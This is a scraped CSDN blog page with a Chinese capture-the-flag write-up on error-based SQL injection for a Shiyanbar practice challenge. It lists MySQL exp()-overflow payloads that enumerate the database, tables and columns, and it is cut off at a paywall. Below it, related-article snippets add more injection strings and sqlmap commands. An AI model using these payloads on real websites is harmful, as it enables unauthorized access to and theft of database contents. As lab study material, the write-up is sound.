实验吧Web-易-简单的sql注入之3(报错的sql盲注之exp)

最新推荐文章于 2022-06-09 22:33:15 发布

大千SS

最新推荐文章于 2022-06-09 22:33:15 发布

阅读量376

点赞数

分类专栏： sql注入实验吧web 文章标签：实验吧报错的SQL注入

本文链接：https://blog.csdn.net/zz_Caleb/article/details/85063838

版权

本文介绍了如何在实验吧Web-易题目中利用报错SQL盲注技巧获取信息。通过发现exp可以绕过过滤，成功进行注入。步骤包括爆库、爆表、爆列名直至获取到flag内容。参考链接提供了更多细节。

摘要由CSDN通过智能技术生成

题目提示是报错注入，于是就用盲注技巧来注入。

这里注入时发现floor，extractvalue，updatexml被吃掉了，用exp可以注入成功。(记住大小写绕过等技巧)

1.爆库

' or exp(~(select * from(select database())a))#
这里最后面的a处可为别的字母，且必须要有

可以看到库名为web1。

2，爆表

' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a))#
或者
' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema='web1')a))#

flag应该在表flag中。

3.爆列名

' or exp(~(select * from(select group_concat(column_name) from information_schema.columns wh

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

大千SS

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

实验吧三道sql注入题目解题思路以及当中至少点整理（简单的SQL注入、简单的SQL注入2、简单的SQL注入）

xiaotaode2012的专栏

08-12

4089

0x00 最近学习CTF有一段时间了，下面将实验吧三题题目的简单SQL注入进行一定的整理， 0x01 简单的sql注入 做题的地址为： http://ctf5.shiyanbar.com/423/web/ 第一步：随便输入个数字load下url：http://ctf5.shiyanbar.com/423/web/?id=1发现是这个，老套路，既然题目提示是过滤我们来各种试试到底过滤了

使用exp进行SQL报错注入

weixin_34082695的博客

08-27

637

0x01 前言概述好消息好消息～作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出来注出数据，你可以读一下作者之前发的博文：BIGINT Overflow Error based injections，drops上面也有对应翻译，具体见这里。当我们拿到MySQL里的函数时，作者比较感兴趣的是其中的数学函数，它们也应该包含一些数据类型来保存数值。所以作者...

参与评论您还未登录，请先登录后发表或查看评论

sql注入--五个报错

weixin_44769042的博客

10-23

278

目录通过floor()报错报错注入之 exp() 报错注入之 BIGINT溢出错误报错注入之 extractvalue 报错注入之 updatexml 通过floor()报错 ?id=1 and (select count(*) from information_schema.tables group by concat((select database()),floor(rand(0)*2))) ?id=1 and (select count(*) from inf.

网络安全--最简单的sql注入

nuoman_cheng的博客

11-10

1074

我们平常见到的输入框：如果用户输入：用户名：user1 or '1'='1' 密码： passwd1 or '1'='1' 那么，SQl会产生为： select * from ziliao where username=user1 or '1'='1' and password = passwd1 or '1'='1' 后面的条件就永远为真，就绕过去

实验吧-简单的注sql入 writeup

qq_24966613的博客

11-29

629

解题链接： http://ctf5.shiyanbar.com/web/index_2.php 1.输入id值，通过回显发现题目应该是进行了空格过滤 2.使用sqlmap进行注入 2.1 python sqlmap.py -u “http://ctf5.shiyanbar.com/web/index_2.php?id=1” –random-agent –tamper=space2comm

sql注入 自学笔记报错注入二阶注入布尔时间盲注基于sqli-labs

02-19

SQL注入是一种常见的Web应用程序安全漏洞，攻击者可以通过构造特定的SQL语句来获取敏感信息或控制数据库。下面是基于SQLi-Labs的SQL注入基础知识点：一、报错注入报错注入是指攻击者通过构造特定的SQL语句，让...

sql盲注之报错注入(附自动化脚本)

xiaoi123的博客

12-29

4752

作者：__LSA__ 0x00 概述渗透的时候总会首先测试注入，sql注入可以说是web漏洞界的Boss了，稳居owasp第一位，普通的直接回显数据的注入现在几乎绝迹了，绝大多数都是盲注了，此文是盲注系列的第一篇，介绍盲注中的报错注入。 0×01 报错注入原理其实报错注入有很多种，本文主要介绍几种常见的报错方法，有新姿势后续再更新。 1. Duplicate

CTFHUB-WEB-SQL注入

K_ShenH的博客

06-09

1247

CTFHUB-WEB-SQL注入

WEB渗透学习笔记3——报错注入和盲注

林林木林林L的博客

07-23

679

报错注入报错注入原理在MYSQL中使用一些指定的函数来制造报错，后台没有屏蔽数据库报错信息，在语法发生错误时会输出在前端，从而从报错信息中获取设定的信息。select/insert/update/delete都可以使用报错来获取信息常用的报错函数 updatexml() updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数； and updatexml(xml_document,Xpathstring,new_value) updatexml(1,concat(0

牛腩学习---SQL注入

My Devil's Cry

03-27

1055

从上个星期6开始，几乎每天都看两集牛腩视频。自我感觉这个讲牛腩的老师讲得特别细致，几乎是手把手的教你如何做一个系统。正是由于这个老师教学的认真，让我明白了很多在重构的时候不是非常理解的一些概念，下面就让我来说说吧！基础总结：在前5集的时候，这个老师讲了数据库的设计和一些UML图的讲解！虽然和我学习的内容有一点不同，但是慢慢的听讲，感觉接受还是挺容易的！到了6-8集就可以加深

注入关

weixin_43245269的博客

06-29

690

注入关1 最简单的SQL注入 分值: 100 Tips题目里有简单提示用户名:admin or '1=1' 密码:随意成功！注入关2 最简单的SQL注入(熟悉注入环境) 分值: 100 最简单的SQL注入 http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 or ‘1=1’ 获得flag。 -- 数字型注入点select * from 表名 where id=1 http://xxx

hackinglab.cn 注入关之一

r00tnb的博客

12-15

3795

题目： Tips题目里有简单提示. writeup: 第一关应该挺简单的。点击题目地址进去，显示的是一个简单的登陆界面，还有一个验证码。查看一下源代码，发现有一个提示：  也就是说登录名已经告诉你了。开始填写表单，登录名就写admin，密码随便填，验证码输入正确，等待返回结果是登录失败！预料之中，在登录名...

Python之路 | 布尔盲注、延时EXP编写

IerkeU的博客

03-29

908

什么是POC、EXP、payload？答： POC：全称为‘Proof of concept’，意为概念验证，常指为一段漏洞的证明代码理解为：发现可能存在的漏洞后，强调对漏洞是否存在进行验证 EXP：全称为‘Exploit’，意为利用，指利用系统漏洞进行攻击的动作理解为：对已存在的漏洞进行利用，强调利用已有的资源 Payload：意为有效载荷，指成功exploit之后，真正在目标系统执行的代码或指令理解为例如使用了一条恶意SQL语句，使网站出现报

CTF解题-网安实验室(注入关)

道阻且长，行则将至。

09-03

4076

万能密码【题目环境】最简单的SQL注入 分值: 100 Tips：题目里有简单提示通关地址【解题过程】查看网页源码，提示使用admin登录：直接上万能密码——admin';#、admin' #、admin' or 1=1 #密码随便输，登录成功： ...

SQL注入-盲注（布尔盲注与时间盲注）

热门推荐

LJH1999ZN的博客

02-10

1万+

一、什么是盲注盲注就是在sql注入过程中，sql语句执行select之后，可能由于网站代码的限制或者apache等解析器配置了不回显数据，造成在select数据之后不能回显到前端页面。此时，我们需要利用一些方法进行判断或者尝试，这个判断的过程称之为盲注。通俗的讲就是在前端页面没有显示位，不能返回sql语句执行错误的信息，输入正确和错误返回的信息都是一致的，这时候我们就需要使用页面的正常与不正常显示来进行sql注入。二、盲注的分类基于布尔类型的盲注基于时间类型的盲注三、利用盲注的

SQL注入 | exp()函数报错

JacobTsang的博客

10-30

6220

0x01原理当传递一个大于709的值时，函数exp()就会引起一个溢出错误。 mysql> select exp(709); +-----------------------+ | exp(709) | +-----------------------+ | 8.218407461554972e307 | +-----------------------+ 1 r...

mysql exp_（转载）使用exp进行SQL报错注入

weixin_35172689的博客

01-18

870

此文为BIGINT Overflow Error Based SQL Injection的具体发现与实践0x01 前言概述好消息好消息～作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出来注出数据，你可以读一下作者之前发的博文：BIGINT Overflow Error based injections，drops上面也有对应翻译，具体见这里。当我们拿到MySQL里的函数时...

构造exp-Python盲注脚本

告白的博客

08-12

476

0x00 搭建环境介绍平常的盲注如果手工会很麻烦，多数情况都会借助sqlmap等相关软件跑，但是有些情况下，考虑到sqlmap的线程以及其他情况，会造成其他的影响，这里我们来简单使用python构造一个盲注脚本，低线程，高效率。利用到metinfo老版本平台，平台中集合多种漏洞，本次实验实验python构造盲注exp，实现注入手工注入测试： 0x01 利用python构造exp-盲注脚本 import requests def get_html(url): "我的功能判断页面内容是否